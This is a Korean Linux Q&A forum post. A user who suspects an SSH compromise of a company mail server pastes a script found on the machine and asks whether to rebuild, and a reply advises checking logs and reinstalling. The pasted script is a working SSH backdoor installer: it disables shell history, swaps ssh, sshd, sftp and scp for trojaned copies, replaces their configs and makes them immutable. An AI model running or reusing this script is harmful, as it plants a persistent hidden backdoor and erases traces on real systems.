질문&답변
클라우드/리눅스에 관한 질문과 답변을 주고 받는 곳입니다.
리눅스 분류

해킹당한거같은데요..ㅜㅜ

작성자 정보

  • 김도형 작성
  • 작성일

컨텐츠 정보

본문

ssh 공격이 들어온거같아서 백도어를 찾아볼려구하다가

#find / -type f -perm +6000 -ls 쳐보니 games란 파일있더군요.

처음보는거같애서 들어가보니 이런게 나오더군요...해킹당한건가용???

회사메일인데 다시 구축해야할까요? /tmp 에 ssh-Z??? 파일도 자꾸재생하구요.

#/usr/local/games/back

#!/bin/bash
unset HISTSAVE
unset HISTFILE
unset SAVEFILE
echo "++++ Starting.... ++++"
chattr -suia /usr/bin/ssh
chattr -suia /usr/bin/sftp
chattr -suia /usr/sbin/sshd
chattr -suia /usr/bin/scp
mkdir -p /etc/rpm
mv /usr/bin/ssh /etc/rpm
mv /usr/bin/sftp /etc/rpm
mv /usr/sbin/sshd /etc/rpm
mv /usr/bin/scp /etc/rpm
rm -rf /etc/ssh/sshd_config
rm -rf /etc/ssh/ssh_config
mv libcrypto.so.4 /lib/libcrypto.so.4
sleep 10
echo "[+] Installing SshD backdor..[+]"
mv ssh /usr/bin/ssh
mv sftp /usr/bin/sftp
mv sshd /usr/sbin/sshd
mv scp /usr/bin/scp
mv 1 /etc/ssh/sshd_config
mv 2 /etc/ssh/ssh_config
chattr +suia /usr/bin/ssh
chattr +suia /usr/bin/sftp
chattr +suia /usr/sbin/sshd
chattr +suia /usr/bin/scp

sleep 10

echo "Restart SshD deamon manualy "

관련자료

댓글 2

홍똘이님의 댓글

  • 홍똘이
  • 작성일
일단 메세지 로그에 접속 성공한지 확인하고 추가 파일이 만들어졌는지 확인하시고요
추가되었다고 생각하시면 일단 백도어 있는지 확인 그리고 기본적인 실행파일 변조되었는지 확인후 변조되었다면 재설치하시는게.. 제일 좋습니다.

김도형님의 댓글

  • 김도형
  • 작성일
back파일의 내용이 백도어를 생성하라는 말인가요?
내용해석좀 부탁드립니다.

공지사항


뉴스광장


  • 현재 회원수 :  60,150 명
  • 현재 강좌수 :  36,433 개
  • 현재 접속자 :  235 명